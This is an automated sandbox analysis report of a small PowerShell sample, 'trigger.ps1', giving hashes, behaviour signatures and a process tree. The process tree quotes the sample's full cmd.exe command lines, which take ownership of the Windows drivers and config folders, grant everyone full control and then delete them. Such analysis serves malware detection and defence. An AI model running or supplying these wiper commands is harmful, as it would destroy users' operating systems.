Analysis
max time kernel: 141s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-08-2024 20:52
Static task: static1
Behavioral task: behavioral1
Sample: trigger.ps1
Resource: win7-20240708-en
6 signatures
150 seconds
General
Target: trigger.ps1
Size: 361B
MD5: f027721d34b4dd5220b236a39b0f75a8
SHA1: b31847f44624ca0c7a53cd9a01f187bad6c4e88c
SHA256: c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6
SHA512: 74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48
Malware Config
Signatures
Possible privilege escalation attempt (4 IoCs)
Processes:
  pid   process
  2796  takeown.exe
  5052  icacls.exe
  3468  takeown.exe
  1220  icacls.exe

Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  pid   process
  2796  takeown.exe
  5052  icacls.exe
  3468  takeown.exe
  1220  icacls.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid   process
  2240  powershell.exe
  2240  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description                    pid   process
  Token: SeDebugPrivilege        2240  powershell.exe
  Token: SeTakeOwnershipPrivilege 2796  takeown.exe

Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
  description                        pid   process         target process
  PID 2240 wrote to memory of 2468   2240  powershell.exe  cmd.exe
  PID 2240 wrote to memory of 2468   2240  powershell.exe  cmd.exe
  PID 2468 wrote to memory of 2796   2468  cmd.exe         takeown.exe
  PID 2468 wrote to memory of 2796   2468  cmd.exe         takeown.exe
  PID 2468 wrote to memory of 5052   2468  cmd.exe         icacls.exe
  PID 2468 wrote to memory of 5052   2468  cmd.exe         icacls.exe
  PID 2240 wrote to memory of 1384   2240  powershell.exe  cmd.exe
  PID 2240 wrote to memory of 1384   2240  powershell.exe  cmd.exe
  PID 1384 wrote to memory of 3468   1384  cmd.exe         takeown.exe
  PID 1384 wrote to memory of 3468   1384  cmd.exe         takeown.exe
  PID 1384 wrote to memory of 1220   1384  cmd.exe         icacls.exe
  PID 1384 wrote to memory of 1220   1384  cmd.exe         icacls.exe
Processes
(indentation shows the process tree; level 1 is the submitted sample's interpreter)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
  PID: 2240
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"
      PID: 2468
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\takeown.exe
          command line: takeown /f C:\Windows\System32\drivers\*
          PID: 2796
          - Possible privilege escalation attempt
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\icacls.exe
          command line: icacls C:\Windows\System32\drivers\* /grant everyone:(f)
          PID: 5052
          - Possible privilege escalation attempt
          - Modifies file permissions

    C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"
      PID: 1384
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\takeown.exe
          command line: takeown /f C:\Windows\System32\config\*
          PID: 3468
          - Possible privilege escalation attempt
          - Modifies file permissions

        C:\Windows\system32\icacls.exe
          command line: icacls C:\Windows\System32\config\* /grant everyone:(f)
          PID: 1220
          - Possible privilege escalation attempt
          - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82